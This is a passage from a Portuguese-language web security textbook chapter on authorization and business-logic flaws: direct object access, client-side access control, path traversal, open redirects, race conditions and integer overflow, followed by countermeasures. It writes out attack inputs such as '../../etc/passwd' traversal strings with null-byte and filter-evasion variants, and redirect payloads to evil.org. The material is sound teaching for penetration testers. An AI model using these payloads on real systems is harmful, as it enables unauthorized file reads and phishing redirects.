2.2.Anote todos os itens de entrada que paream ser chaves primrias de registros ou
identificadores de objetos e os respectivos valores.
374
Figura 8.3
Exemplo de aplicao vulnervel
a acesso direto a
objetos: (a) Mensagens de esruser.
(b) Mensagens
de admin.
2.3.Verifique se h algum padro que pode ser identificado nos valores de cada par-
metro encontrado no passo anterior.

2.4.Gere novos valores, de acordo com o Passo 2.3, e os utilize nos parmetros asso-
ciados, para realizar requisies aplicao.

Acesso direto a recursos estticos

Uma variao do ataque discutido na seo anterior consiste em acessar diretamente
recursos estticos, presentes no servidor. O problema se manifesta quando o sistema

disponibiliza links diretos para objetos, sem uma camada de cdigo que faa o papel
de monitor de referncias. Com isso, o servidor web atende as requisies, sem impor
nenhuma restrio, supondo que o controle de acesso nativo no esteja habilitado para
o diretrio em que esto os recursos.
Esse cenrio ocorre frequentemente em stios web de eventos, que disponibilizam aos participantes todos os materiais das diversas apresentaes realizadas. Para exibir a pgina que
lista esses contedos, o usurio precisa estar autenticado, porm, para obter os arquivos,
no. A premissa adotada incorretamente, nesse caso, resume-se em assumir que somente
usurios legtimos so capazes de obter os nomes dos recursos fornecidos.
A aplicao ilustrada na Figura 8.4 exemplifica a vulnerabilidade supracitada. Observe na
barra de estado do navegador web que o arquivo ls.txt obtido diretamente a partir do
diretrio files do servidor. Embora o usurio esruser, por meio da interface do sistema,
somente tenha visibilidade de trs arquivos, ele pode inferir a existncia de outros mais. No
exemplo, fica claro que cada recurso tem o nome de um comando do sistema operacional
Linux, e, assim, natural assumir a presena de arquivos como ps.txt e echo.txt. Para
complementar, considere-se novamente o caso de pgina de evento e que os nomes de
arquivos sigam um padro como <sobrenome>.<nome>.pdf, com base em cada palestrante. Neste cenrio, basta obter alguns dos arquivo, para compreender a lgica de nomes
Figura 8.4
Aplicao que permite acesso direto a
recursos estticos.
A deteco do problema descrito muito simples e ocorre nas fases de reconhecimento

e mapeamento da aplicao, quando os recursos fornecidos de maneira esttica podem
ser enumerados pelo analista de segurana. Qualquer um desses itens, que necessite ser
acessvel somente a usurios autorizados, deve ser indicado no relatrio como vulnervel a
adotada e conseguir o conjunto completo, diretamente do servidor.
acesso no controlado.
375
Aplicaes vulnerveis
Cite exemplos de recursos que podem ser acessados diretamente em uma aplicao vulnervel.
Controle de acesso no lado cliente da aplicao

Controles de segurana que so executados no lado cliente da aplicao so ineficazes,
pois o usurio tem poder total sobre o que ocorre em seu ambiente. Apesar desse fato,
diversas aplicaes reais acabam sendo desenvolvidas com essa abordagem, o que as
torna completamente vulnerveis a usurios maliciosos.
Alguns exemplos de defeitos desse tipo, que so abordados neste texto, incluem mecanismos de autorizao, manuteno de perfil e proteo de referncias a objetos.
Autorizao no lado cliente da aplicao

Para discutir esse problema, considere-se uma aplicao que, aps a autenticao do
usurio, exibe a mesma lista de funcionalidades a todos, mas que controla o acesso a elas
por meio de cdigo Javascript, com base em uma matriz de controle de acesso obtida do
servidor. Seja cada link definido de maneira similar ilustrada abaixo:
<a href=dummy.php id=1 onclick=return changeURL(1)>

Caixa de mensagens</a>
Matriz de controle
de acesso
Tabela que indica
as aes que cada
indivduo do ambiente
pode realizar sobre
cada objeto existente.
Observe-se que a URL definida especifica um recurso invlido do servidor e ela ajustada
por meio da funo changeURL(), que invocada quando o link clicado. O cdigo
Javascript que realiza o controle de acesso pode ser visto na Figura 8.5:
<script>
var acm = [0,0,0,0,0];
acm[0] = 1;
function changeURL(id){
if (acm[id-1] != 1) {
alert(Voc no tem autorizao para acessar esta opo!!!);
return false;
}
document.getElementById(id).href=acao+id+.php;
return true;
}
</script>
376
Figura 8.5
Cdigo Javascript
que responsvel
pelo processo de
autorizao.
A varivel acm constitui a matriz de controle de acesso e definida pelo servidor, de

acordo com o perfil do usurio autenticado. O acesso do usurio s permitido se a posio
do vetor associada ao link contiver o valor um. Note-se que a URL, construda dinamicamente, relativa e tem o formato acao<id>.php, sendo que <id> corresponde ao valor
passado no manipulador de evento onclick de cada link. A mesma anlise feita aqui
poderia ter sido realizada por um usurio malicioso, para descoberta das URLs dos diversos
recursos da aplicao. Em seguida, bastaria efetuar as requisies diretamente pelo navegador web, contornando, assim, o controle de acesso provido pelo Javascript embutido.
Esse tipo de vulnerabilidade normalmente encontrado, em um teste de invaso, na
etapa de mapeamento, durante a anlise dos diversos scripts fornecidos pela aplicao.
Qualquer item que manipule links ou que exiba mensagens de erro referentes a controle
de acesso deve ser inspecionado com mais ateno, pelo analista de segurana.
Manuteno de perfil no lado cliente da aplicao

Quaisquer informaes relacionadas aos processos de autenticao e de autorizao
devem, de acordo com as melhores prticas de segurana, ser armazenadas como parte
do estado de cada sesso, no lado servidor da aplicao.
O propsito disso evitar que usurios maliciosos tenham a chance de manipular esses
dados e, com isso, comprometer os mecanismos de controle de acesso, realizando
ataques como escalada de privilgios e contorno de autenticao, por exemplo.
Infelizmente, muitos so os sistemas reais que no respeitam essa regra e fazem o contrrio, na maioria das vezes, devido adoo indevida de um mecanismo de gerenciamento de sesses de origem caseira.
Observe-se, como exemplo, a aplicao ilustrada na Figura 8.6 e note-se que a URL do link
para a caixa de mensagens inclui um parmetro uid com valor esruser (vide barra de
estado). Isso um grande indicativo de que o sistema mantm o estado da sesso, ou parte
dele, no lado cliente da soluo. Quando algo assim encontrado, um atacante pode alterar
o valor do parmetro e enviar a requisio, para ver se consegue um acesso mais privileroot, pois eles so comumente utilizados em ambientes de produo.
Figura 8.6
Aplicao que
mantm perfil no
lado cliente.
giado. Nesse cenrio, alguns identificadores que podem ser testados incluem admin e
377
Em alguns casos, um parmetro booleano, utilizado para indicar um perfil administrativo,

adicionado s requisies, sempre que o usurio autenticado for privilegiado. Essa prtica
segue a estratgia de segurana por obscuridade, a qual gera uma falsa sensao de proteo. Mesmo que usurios comuns no saibam da existncia do parmetro, h diversos
caminhos que levam sua descoberta. Ademais, dada a frequncia com que empregado,
natural tentar submeter variaes como adm=Y, adm=S, admin=Y, admin=S, root=Y
e root=S, como parte da requisio. Muitas vezes, esse tipo de verificao coroado com
uma escalada vertical, para uma conta com o mximo de privilgios.
Os cenrios vistos nesta seo apenas reforam a ineficcia de se adotar qualquer controle
de seguran, no lado cliente da aplicao. Assim, sempre que situaes similares forem
detectadas em um teste de invaso, elas devem ser devidamente reportadas.
Proteo de referncias a objetos

Com o intuito de evitar ataques de acesso direto a objetos, diversos mecanismos foram
criados e adotados no passado, porm, alguns deles continuaram sendo vulnerveis,

porque no deixaram de expor a real identidade do objeto, de uma maneira ou de outra.
A premissa adotada, de modo geral, era de que a causa raiz do problema se encontrava na exposio direta de uma chave ou nome de um elemento interno da aplicao.
Embora isto estivesse correto, a soluo de somente ofuscar o identificador e seguir
enviando o resultado para o usurio estava errada, pois o atacante ainda conseguia
inferir as referncias para recursos alheios.
Nos prximos pargrafos, algumas dessas solues ineficazes sero discutidas, com base
no sistema ilustrado na Figura 8.7, que exibe o arquivo, cujo nome especificado em um
parmetro da requisio. Considere-se que a verificao de privilgios ocorre somente na
montagem da tela, na qual so includos links apenas para os recursos que o usurio tem o
direito de acessar. Na verso original da aplicao, quando o atacante descobria os nomes
de outros arquivos, ele podia visualiz-los simplesmente ajustando o valor do parmetro
correspondente. Para impedir esse ataque, os desenvolvedores ofuscaram os nomes dos
arquivos empregando uma srie de tcnicas diferentes, de modo que o usurio malicioso
no pudesse mais construir a requisio.
378
Nesse exemplo, o link para a RFC 2616 representa o estado original da aplicao, que
expunha completamente o nome do arquivo na URL:
http://refp.esr.rnp.br/view.php?f=fielding.1999.txt&t=0
Note-se que o nome passado a view.phppor meio do parmetro f e aparenta seguir o
formato <autor>.<ano>.txt. A partir desse padro, fica muito fcil acessar outros arquivos
que existem na base, desde que se saiba o autor e a data da publicao.
Figura 8.7
Aplicao que protege referncias a
objetos de maneira
insegura.
A primeira tentativa de melhoria est ilustrada no link para a RFC 2617, que no faz nada
mais que escrever o nome do arquivo ao contrrio:
http://refp.esr.rnp.br/view.php?f=txt.9991.sknarf&t=1
fcil perceber que o nvel de dificuldade de explorao, nesse caso, continua basicamente
o mesmo que o anterior.
Uma tcnica diferente, utilizada no link para a RFC 2821, resulta em URLs como a seguinte:
http://refp.esr.rnp.br/view.php?f=a2xlbnNpbi4yMDAxLnR4dA==&t=2
Embora isso parea crptico para usurios leigos, profissionais de computao conseguem
identificar facilmente que se trata de codificao em BASE64, a qual coberta no Captulo 9
deste livro. Nesse cenrio, o passo natural de um atacante consiste em decodificar o valor do
parmetro f, a2xlbnNpbi4yMDAxLnR4dA==, e analisar se o resultado, klensin.2001.txt,
faz sentido no escopo da aplicao. Caso isso no ocorresse e a sada fosse uma sequncia
binria de carter aleatrio, poderia ser um indicativo de texto cifrado, o que evitaria a construo de identificadores para arquivos arbitrrios. Essa situao, contudo, no impediria o
acesso ilegtimo, se fossem conhecidos outros valores para f, uma vez que um monitor de
referncias no implementado.
Finalmente, o ltimo exemplo trata do link para a RFC 959, o qual especifica a URL:
http://refp.esr.rnp.br/view.php?f=706f7374656c2e313938352e747874&t=3
Pelo conjunto de caracteres presentes no valor do parmetro f, fcil observar que se
tratam de dgitos hexadecimais. Analisando com um pouco mais de cuidado, nota-se que
os valores dos dgitos, considerados em pares, so prximos e esto na regio de caracteres imprimveis da tabela ASCII. Realizando a converso, obtm-se o nome de arquivo
postel.1985.txt, com o que se conclui que o processo no robusto. Assim como no caso
anterior, o resultado da operao poderia ser uma sequncia aleatria de octetos, quando,
Em todas as solues analisadas, a causa raiz da vulnerabilidade reside no uso de processos

que permitem, facilmente, recuperar o nome real do arquivo, a partir do valor ofuscado
enviado ao usurio. Alm disso, uma vez conhecido o mecanismo de proteo adotado
pela aplicao, o atacante pode forjar requisies para arquivos arbitrrios, pois elas no
dependem de nenhum valor secreto conhecido somente pelo sistema.
Percurso de caminho
Aplicaes que exibem ou escrevem arquivos especificados por usurios podem estar
sujeitas a ataques de percurso de caminho, caso os devidos cuidados no sejam tomados.
A causa raiz do problema consiste em permitir que, alm do nome do arquivo, seja
tambm informado o local em que ele se encontra, em vez de assumir que esto em um
determinado diretrio.
Em alguns casos, essa premissa adotada por meio de um cdigo como o abaixo, que concatena o valor fornecido pelo usurio com o caminho da pasta que deve ser utilizada:
$arquivo = /var/arquivos/.$nome;
ento, as mesmas consideraes seriam vlidas.
379
Um usurio malicioso, porm, pode fornecer um valor como:
../../etc/passwd
O que resulta no caminho /var/arquivos/../../etc/passwd, cujo valor cannico /etc/
Valor cannico
passwd, uma vez que a sequncia .. se refere ao diretrio pai.
Corresponde ao
formato padronizado
de uma informao que
pode ser representada
de mais de uma maneira
diferente.
Observe-se que, com esse ataque, possvel acessar qualquer arquivo do ambiente,
para o qual a conta de sistema operacional da aplicao possua privilgio de leitura.

Muitas vezes, no possvel saber em que ponto da rvore de diretrios encontra-se
a pasta base da aplicao e, assim, fica difcil estabelecer quantas ocorrncias de ..
devem ser empregadas. Nesses casos, uma tcnica que pode ser usada para evitar que a
descoberta seja por tentativa e erro, resultando na submisso de mltiplas requisies,
resume-se em enviar uma grande sequncia de ../ seguida do nome de arquivo desejado (Stuttard e Pinto, 2007), como ilustrado a seguir:
../../../../../../../../../../../../etc/passwd
A razo deste mtodo funcionar reside no fato de que alguns sistemas operacionais
substituem a repetio de ../ pela raiz do sistema de arquivos, quando o percurso passa
desse ponto. Isso pode ser observado na Figura 8.8 e Figura 8.9, para os sistemas Linux e
Windows, respectivamente.
C:\> cd
C:\
C:\>dir \temp /w
O volume na unidade C no tem nome.
O Nmero de srie do volume 5059-23D3
Pasta de C:\temp
[.]
[..]
Hash.class
[Security]
2 arquivo(s)
3 pasta(s)
380
Hash.bat
3.020 bytes
132.434.340 bytes disponveis
Figura 8.8
Percurso de
caminho em Linux
que passaria da raiz.
C:\>dir ..\..\..\..\..\..\..\..\temp /w
O nmero de srie do volume 5059-23D3
Pasta de C:\temp
Figura 8.9
Percurso de
caminho em
Windows que
passaria da raiz.
[.]
[..]
Hash.bat
2 arquivo(s)
3 pasta(s)
Hash.class
[Security]
3.020 bytes
Outra tcnica que pode ser til, para verificar a possvel existncia da vulnerabilidade em
uma aplicao baseada em Windows, consiste em enviar alguns passos de caminho
invlidos, mas cancelados imediatamente por ocorrncias de ../. Se o arquivo especificado ao fim desse valor for exibido normalmente, h uma boa chance de que o caminho
tenha sido passado sem tratamento para o sistema de arquivos, indicando a presena do
defeito. Um exemplo desse comportamento pode ser visto na Figura 8.10.
C:\>dir /w
[.]
[..]
Hash.bat
2 arquivo(s)
3 pasta(s)
Hash.class
[Security]
3.020 bytes
C:\>dir este\caminho\nao\existe\..\..\..\.. /w
Pasta de C:\Temp
Figura 8.10
Percurso por
subdiretrios
inexistentes.
[.]
[..]
Hash.bat
Hash.class
[Security]
Pasta de C:\Temp
381
2 arquivo(s)
3 pasta(s)
3.020 bytes
Considere-se agora uma aplicao ligeiramente diferente daquela do cenrio original, a qual
adiciona uma extenso de arquivo, como no exemplo a seguir:
$arquivo = /var/arquivos/.$nome..txt;
Se o atacante fornecer a mesma entrada maliciosa, utilizada inicialmente, obtmos o
caminho /var/arquivo/../../etc/passwd.txt, cujo valor cannico /etc/passwd.txt. Claramente, a explorao deixa de funcionar, salvo se for possvel comentar, de alguma maneira,
tudo que aparecer aps o valor introduzido. Uma possibilidade se apresenta quando o nome
de arquivo passado a uma funo em cdigo nativo, que utiliza o caractere nulo para
delimitar o final de uma cadeia de caracteres. Por exemplo, considere-se que o cdigo de
uma aplicao PHP para exibio de arquivos do tipo texto seja o representado na Figura 8.11:
$f=$_GET[f];
$file = files/.$f..txt;
$out = popen(cat .$file, r);

while (!feof($out)) {
echo(fgets($out).<br>);
}
pclose($out);
Se o valor passado no parmetro f for terminado com %00, conforme ilustrado:
../../../../../etc/passwd%00
O seguinte comando de sistema operacional executado pela funo popen():
cat files/../../../../../etc/passwd\0.txt
O que faz com que tudo aps passwd seja desconsiderado, resultando na exibio do
arquivo /etc/passwd.
382
De modo a evitar o ataque de percurso de caminho, alguns desenvolvedores tentam

higienizar a entrada, em uma nica passagem, em vez de simplesmente rejeit-la (Stuttard
e Pinto, 2007). Nesses casos, possvel fornecer as sequncias de caminho dentro delas
mesmas, como se v nos dois exemplos abaixo, para evadir o filtro utilizado pela aplicao:
1 ....//
1 ....\\
Figura 8.11
Cdigo PHP para
exibio de arquivos
Por fim, para testar se uma aplicao vulnervel a ataques de percurso de caminho, o
seguinte roteiro pode ser empregado em um teste de invaso:
1.1.Selecione aqueles que parecem fornecer um nome de arquivo.
1.2.Se o nome completo de arquivo especificado, incluindo a extenso:
1.2.1. Submeta o nome de um arquivo que se sabe existir no ambiente, precedido de

uma longa sequncia de ../.
1.2.2. Se o arquivo no for exibido, tente outros candidatos, dependendo da mensagem de erro fornecida.
1.2.3. Se no, a aplicao vulnervel a percurso de caminho.
1.3.Se no:
1.3.1. Submeta o nome de um arquivo que se sabe existir no ambiente, precedido de

uma longa sequncia de ../ e finalizado com %00.
1.3.2. Se o arquivo no for exibido, tente outros candidatos, dependendo da mensagem de erro fornecida. Pode ser que a evaso com %00 no seja aplicvel e
o teste deva ser encerrado.
1.3.3. Se no, a aplicao vulnervel a percurso de caminho.
Redirecionamento no validado
Redirecionamento uma tcnica que permite instruir o navegador web a carregar outra
pgina, aps a originalmente requisitada, podendo ser utilizado, por exemplo, para
evitar a quebra de links, quando um recurso movido para um lugar diferente. Embora,
muitas vezes, isso ocorra dentro de um mesmo domnio, tambm possvel realizar o
processo para domnios diferentes.
refletir a URL do recurso carregado. A implementao do processo de redirecionamento

pode ser realizada tanto no lado do servidor quanto do cliente, com resultados similares.
No primeiro caso, a ideia consiste em devolver ao navegador web uma mensagem com
cdigo de estado 3XX, seguido de um cabealho Location:, especificando a nova URL. Essa
abordagem, que pode ser atendida de maneira programtica ou por meio da configurao
htaccess
Arquivo, aceito por
muitos servidores web,
que permite redefinir
quaisquer itens da
configurao principal,
para os diretrios em
que esteja presente.
Originalmente, era mais
restrito, tendo apenas
o propsito de definir
privilgios de acesso
por diretrio.
do arquivo .htaccess, faz com que uma requisio seja efetuada para o novo endereo
informado. Se o cdigo fornecido for o 301 (Moved Permanently), solicitaes subsequentes
para o recurso original so substitudas, pelo prprio navegador web, para a URL fornecida
no redirecionamento.
Do lado cliente, um dos mtodos de redirecionamento envolve o uso dometa-taRefres,
disponvel na linguagem HTML:
<meta http-equiv=REFRESH content=3;url=http:// esr.rnp.br/end.php>

Note-se que possvel especificar um intervalo de tempo a ser aguardado, em segundos,
antes que o acesso ao novo endereo seja realizado.
O uso deRefres expressamente desaconselhado pelo W3C, uma vez que pode quebrar
Em qualquer um dos casos, a barra de endereos do navegador web atualizada, para
383
a funcionalidade fornecida pelo boto Retornar. Isso acontece porque, ao carregar a pgina
anterior, que contm o marcador em questo, o navegador redireciona o usurio novamente para a pgina especificada, impedindo, assim, o retorno.
Outro mecanismo disponvel no lado cliente do sistema consiste em utilizar cdigo
Javascript, mais especificamente a funo location.replace(), da maneira ilustrada a seguir:
<script language=javascript>
setTimeout(function() {location.replace(http://esr.rnp.br/end.php);
},3000);
</script>
O mtodo location.replace() substitui a pgina atual pela especificada, removendo a
primeira do histrico de navegao. Desse modo, a funcionalidade do boto Retornar preservada, ao contrrio da soluo baseada emRefresh.
Finalizada essa apresentao de tecnologias para redirecionamento, vejamos que problemas de segurana surgem com o uso incorreto delas. A causa raiz da vulnerabilidade
consiste na utilizao de informaes fornecidas pelo usurio, sem o devido tratamento, na
composio da URL para a qual ele ser direcionado.
Isso pode ser usado por atacantes, para carregar pginas maliciosas, a partir de um
domnio confivel, de modo a conseguir mais facilmente que vtimas as visitem, do que
se fosse necessrio clicar em links suspeitos.
Por exemplo, considere-se o seguinte trecho de cdigo em PHP:
<?php
header(HTTP/1.1 302 Found);
header(Location: .$_GET[url]);
?>
Supondo que o nome do script seja redir.php, localizado emhttp://esr.rnp.b, um usurio
malicioso poderia fornecer um link como o seguinte a uma potencial vtima:
<a href=http://esr.rnp.br/redir.php?url=http%3A%2F%2Fwww.evil.
org%2F>
Clique e concorra a prmios!!!</a>

O qual, se clicado, causaria um redirecionamento parahttp://www.evil.or, uma vez que o
valor malicioso do parmetro url concatenado ao cabealhoLocatio.
Com o intuito de corrigir o problema, a equipe de desenvolvimento pode incluir o seguinte
filtro, que verifica se a URL contm o nome de domnio esperado:
<?php
if (stripos($_GET[url], http://esr.rnp.br/) === false) {
echo(<h2>Domínio inválido!</h2>);
exit;
384
}
header(Location: .$_GET[url]);
?>
Neste caso, o link anterior no funcionaria, pois referencia um domnio diferente do esperado pela aplicao. Entretanto, a soluo ainda vulnervel, pois fica satisfeita com a presena dehttp://esr.rnp.br em qualquer ponto do argumento. Graas a isso, uma maneira
de quebrar o mecanismo de proteo envolve a submisso do valor:
http://www.evil.org?u=http://esr.rnp.br/
Outra tentativa de solucionar a vulnerabilidade consiste em adicionar o nome de domnio
correto, como prefixo, ao valor do parmetro fornecido pelo usurio:
<?php
header(Location: http://esr.rnp.br.$_GET[target]);
?>
Note-se, no cdigo acima, que no h uma barra (/) ao final do nome de domnio. Como
seria possvel utilizar a ausncia desse caractere em um ataque? Considerando que o atacante possui controle do servidor de DNS do domnio evil.org, o seguinte valor pode ser
passado para o parmetro target (Stuttard e Pinto, 2007):
.evil.org
Resultando no redirecionamento para o domnioesr.rnp.br.evil.or.
tipo de vulnerabilidade em aplicaes web, so os seguintes:

1.1.Verifique aqueles que so usados em redirecionamento, tanto no lado cliente, como
no servidor. Neste ltimo caso, isso pode ser feit, observando-se se a resposta
contm um cdigo de estado 3XX.
1.2.Substitua o valor dos itens encontrados, um por vez, pelo nome de um recurso do
servidor que se saiba existir. Se o redirecionamento ocorrer para o elemento escolhido, a aplicao sofre da vulnerabilidade.
1.3.Repita o passo anterior, mas especificando uma URL absoluta para outro domnio.
Se a pgina especificada for carregada, a aplicao tambm pode ser usada para
redirecionamentos externos.
Para finalizar esta seo, os passos que podem ser seguidos em um teste, para detectar este
385
Condies de corrida
Condies de corrida so conhecidas h muito tempo (Netzer e Miller, 1992) e ocorrem
quando processos que so executados concorrentemente manipulam recursos compartilhados, sem o uso de mecanismos de sincronizao.
Como resultado direto deste problema, programas podem apresentar comportamento
inesperado, o qual, na maioria das vezes, difcil de ser reproduzido e depurado.
Para melhor compreender a situao, considere-se o pseudocdigo ilustrado na Figura 8.12,
tendo em mente que a notao [...]BD denota a manipulao de valores em um banco de dados.
01 x = [saldo]BD;
02 if (x >= val) {
03
x = x val;
04
[saldo]BD = x;
Figura 8.12
Cdigo sujeito
a condies de
corrida.
05 }
Imaginem-se que duas instncias do cdigo, P#1 e P#2, sejam executadas concorrentemente, que val inicie, respectivamente, com os valores 70 e 50 e que [saldo]BD contenha o
valor 100. Supondo a fatia de tempo alocada para a execuo de cada processo, um possvel
resultado seria o ilustrado na Figura 8.13. Observe-se que o valor final de [saldo]BD 50, em
vez de 30, que era o esperado da execuo sequencial de P#1 e P#2. Isso acontece porque a
execuo dos processos no atmica e, assim, quando a condio da linha 02 verificada
em cada caso, ainda existe saldo suficiente para a realizao da transferncia.
P#1
fatia de tempo
01
P#2
# linha
val
01
100
70
100
02
100
70
100
03
30
70
100
02
03
04
04
30
# linha
[saldo]BD
01
100
50
100
02
100
50
100
03
50
50
100
70
Figura 8.13
Resultado da execuo concorrente de
duas instncias do
cdigo da
Figura 8.12.
30
04
50
50
50
Alguns impactos segurana decorrentes de condies de corrida, que podem ser
citados, incluem a violao de autenticao, a adulterao da lgica de negcio do

sistema e a quebra do mecanismo de autorizao e de outros controles.
Alguns exemplos reais, no escopo de aplicaes web, podem ser encontrados no estudo
realizado por Paleari et al. (2008) sobre o assunto, no qual, tambm, propm tcnicas para
deteco dinmica do problema. Note-se, contudo, que a melhor abordagem para esse fim
ainda consiste na inspeo do cdigo fonte da aplicao.
386
Condies de corrida
O que so condies de corrida?
Vulnerabilidades na lgica de negcio

A camada de lgica de negcio da aplicao responsvel por ligar as camadas de apre-
sentao e de dados, impondo as regras de negcio aplicveis.

Por exemplo, para realizar o pagamento de um boleto bancrio, o saldo disponvel em conta
somado ao limite concedido pela instituio financeira ao cliente deve ser suficiente, para
cobrir a despesa.
Erros de codificao da regra ou na lgica estabelecida podem resultar em vulnerabili-
dades, que podem ser exploradas com os mais diversos objetivos.

Neste contexto, a seguinte lista de casos reais apresentada por Grossman (2007):
1 TV interativa telespectadores podiam mandar comentrios, para serem apresentados

como texto em um programa de televiso. De modo a evitar a exibio de contedo no permitido, a produo realizava uma triagem prvia do que poderia ou no ir ao ar. O problema,
porm, era que, depois de realizado esse crivo, o usurio podia realizar quaisquer modificaes no texto, sem novas verificaes. Graas a isso, muitas pessoas utilizaram a brech, para
fazer comentrios ofensivos, expor opinies e divulgar produtos e servios, gratuitamente.
1 Mac World 2007 Expo cdigos prioritrios de cinco caracteres podiam ser utilizados, no
processo de registro online, para se conseguir iseno da taxa de inscrio. Devido ao volume
de participantes, para evitar trfego de rede e processamento desnecessrios, uma lista de
hashes dos cdigos vlidos era enviada ao cliente, para verificao local, antes da submisso.
a construo de um dicionrio que traduzia cdigos para hashes era totalmente factvel, o
qual permitiu que inmeras pessoas participassem gratuitamente do evento.
1 Competio simulada de bolsa de valores o objetivo do desafio era apontar os participantes com as carteiras mais rentveis, aps dez rodadas de uma semana cada, os quais,
alm de concorrerem a dez mil dlares por vez, poderiam participar da final, que distribua um
prmio de um milho de dlares. O processo de compra de aes no jogo era composto por
dois passos: o primeiro consistia na seleo de papis e especificao de cotas e, o segundo,
na confirmao ou desistncia da transao. As vulnerabilidades apresentadas pelo simulador
resumiam-se em permitir executar a segunda etapa, aps o fechamento dirio do mercado, e
a manter o preo do momento da reserva. Com isso, vrios pedidos podiam ser realizados, ao
longo do dia, mas somente os papis lucrativos seriam confirmados e adicionados carteira.
1 Vinte e um neste jogo de cartas, tambm conhecido por blackjack, ganha aquele cuja
soma das cartas chega mais prximo de vinte e um, sem, contudo, exceder este valor. Cada
uma das figuras (dama, valete e reis) vale dez, o s, um ou onze, conforme for mais conveniente, e as demais, o prprio nmero estampado. Nos cassinos, quando a carta aberta da
mesa um s, um seguro opcional deve ser oferecido aos jogadores, para o caso de a outra
carta valer dez. Em uma verso online do jogo, havia um atraso perceptvel na oferta de
Como apenas letras maisculas e nmeros eram permitidos e devido ao pequeno tamanho,
segur, sempre que a carta fechada era favorvel mesa. Com essa informao adicional, os
usurios conseguiam aumentar as chances de ganho monetrio.
387
Como possvel observar pelos cenrios apresentados, erros desse tipo decorrem da
adoo de algumas premissas equivocadas, alm de serem difceis de detectar.

Nas prximas subsees, mais dois exemplos sero discutidos.
Transferncia de valor negativo

Considere-se uma aplicao bancria que permite ao usurio realizar transferncias de
valores entre contas, desde que haja saldo suficiente para a operao. Seja o cdigo responsvel por garantir essa regra de negcio o seguinte:
if ($amount > $balanceA) {

$message = $prefix.Valor solicitado é maior que o saldo.;
goto error;
}
$balanceA = $balanceA - $amount;
$balanceB = $balanceB + $amount;
Observe-se que, se um valor maior que o saldo for solicitado, uma mensagem de erro definida e nenhuma transferncia realizada. Caso contrrio, o montante subtrado da conta
original ($balanceA) e somado conta destino ($balanceB). Aps realizar diversos testes que
reforaram a correo do caso de uso, a equipe liberou a funcionalidade para produo.
Porm, ataques nunca ocorrem seguindo-se casos documentados, mas, sim, fluxos inesperados de execuo. Com isto em mente, o que acontece se o cliente fornecer um valor
negativo para transferncia? Analisando o cdigo, novamente, percebe-se que isso no seria
barrado pelo if, pois qualquer nmero negativo menor que um positivo. Como resultado,
ao contrrio do esperado, o valor creditado conta de origem e debitado da outra. A causa
raiz da vulnerabilidade, neste cenrio, resume-se na validao incorreta de entrada, a qual
no pode ser negativa.
Emprstimo acima do limite

Antes de descrever este cenrio, necessrio relembrar como a representao de
nmeros inteiros em sistemas computacionais. O esquema mais utilizado chamado de
complemento de dois, o qual, considerando-se nmeros de n bits, calcula um valor negativo
x, por meio da frmula 2n x. Como o total de valores que podem ser representados por n
bits sempre par, e um intervalo simtrico de inteiros, devido ao zero, contm um nmero
mpar de elementos, a faixa resultante de representao assimtrica. Por conveno,
adota-se que o lado negativo deve ser sempre o maior, e, assim, nmeros de n bits podem
388
assumir valores de -2n-1 a 2n-1-1.

Um fato imediato que pode ser constatado que nem sempre o resultado de algumas operaes caber na mesma quantidade de bits. Por exemplo, considere-se n=8, o que permite
representar inteiros de -128 a 127. Neste cenrio, as seguintes expresses ilustram casos
que resultam em valores fora da faixa permitida:
1 100 + 30.
1 -100 - 30.
1 -(-128).
1 100 * 2.
1 -128 / -1.
Esta situao, chamada de extravasamento de inteiro, no gera um erro de execuo, mas,
sim, um resultado inconsistente, que acaba introduzindo vulnerabilidades em um sistema.
De modo geral, o valor obtido com essas operaes consiste na representao binria do
inteiro esperado, porm, truncado com n bits.
Considere-se, agora, outra aplicao bancria que concede um limite de crdito, para cada
cliente, e que o emprstimo pode ser feito por meio de uma aplicao web. Para evitar que
um valor maior que o permitido seja solicitado, o seguinte trecho de cdigo executado:
if (limiteUsado + valorEmprestimo <= limiteMaximo) {

// Concede o emprstimo
valorConta = valorConta + valorEmprestimo;
} else {
// Exibe mensagem de erro
}
Note-se nesse cenrio que, diferentemente do exemplo da seo anterior, no adianta fornecer um valor de emprstimo negativo, pois isso resultaria na diminuio do montante em
conta, ao invs do que se quer obter. Por outro lado, se o valor solicitado somado ao limite
j usado for maior que o disponibilizado, a transao impedida e uma mensagem de erro,
exibida. Como um usurio malicioso poderia, ento, subverter o controle instalado?
Para ilustrar o ataque, assuma-se que limiteUsado, valorEmprestimo e limiteMaximo
sejam inteiros de 16 bits, que armazenam, respectivamente, 8000, 0 e 10000, e que valorConta um inteiro de 32 bits, contendo 0. Sabendo do problema de extravasamento de
inteiros, um usurio malicioso pode fornecer, para valorEmprestimo, o nmero 30000, que
extrapola o limite de crdito concedido, mas faz a expresso limiteUsado + valorEmprestimo <= limiteMaximo ser avaliada como -27536 <= 10000, ou seja, verdadeira. Isso ocorre
porque nmeros sinalizados de 16 bits no podem representar o valor 38000.
A soluo para o problema consiste em, antes de realizar operaes que possam resultar em
extravasamento de inteiros, converter os operandos para um tipo maior e s ento efetuar
o clculo e tomar decises.
Figura 8.14
Extravasamento de
inteiro: (a) 100 + 30.
(b) 100 * 2.
(c) 100 * 8.
389
Ferramentas automatizadas
Ferramentas automatizadas so capazes de detectar falhas na lgica de negcio? Justifique
sua resposta.
Contramedidas
As seguintes contramedidas devem ser adotadas, para evitar a ocorrncia das vulne-
rabilidades que afetam o mecanismo de autorizao e a lgica de negcio da aplicao

(Stuttard e Pinto, 2007; Meucci et al., 2008):
1 O mecanismo de autorizao deve ser invocado, imediatamente antes de uma operao ser realizada, respeitando-se os requisitos de um monitor de referncias.
1 Nunca use o cabealho HTTP Referer para controlar o acesso s pginas da aplicao,
pois ele pode facilmente ser forjado pelo usurio.
1 Identificadores internos de objetos, como chaves primrias de tabelas em bancos

de dados, por exemplo, no devem ser expostos aos usurios. Em vez disso, ndices
indiretos, gerados de maneira aleatria, devem ser empregados e armazenados no
objeto de sesso de cada usurio, considerando que j tenha sido autenticado.
1 No use o servidor web para fornecer, diretamente, recursos estticos que sejam sensveis. Em vez disso, crie um monitor de referncias, que seja invocado, sempre que
um usurio do sistema tentar acess-los.
1 Restrinja o acesso a funes administrativas somente a algumas mquinas do parque

computacional.
1 Tome as decises relacionadas a controle de acesso sempre no lado servidor da

aplicao.
1 Quando a aplicao precisar manipular arquivos especificados por usurios:

2 Valide o nome de arquivo fornecido pelo usurio, por meio de tcnicas de lista
branca. Isso impedir que caracteres para percurso de caminho sejam utilizados.
2 Garanta que todo arquivo manipulado esteja dentro do diretrio alocado para
esse propsito.
2 Considere executar a aplicao dentro de um chroot.

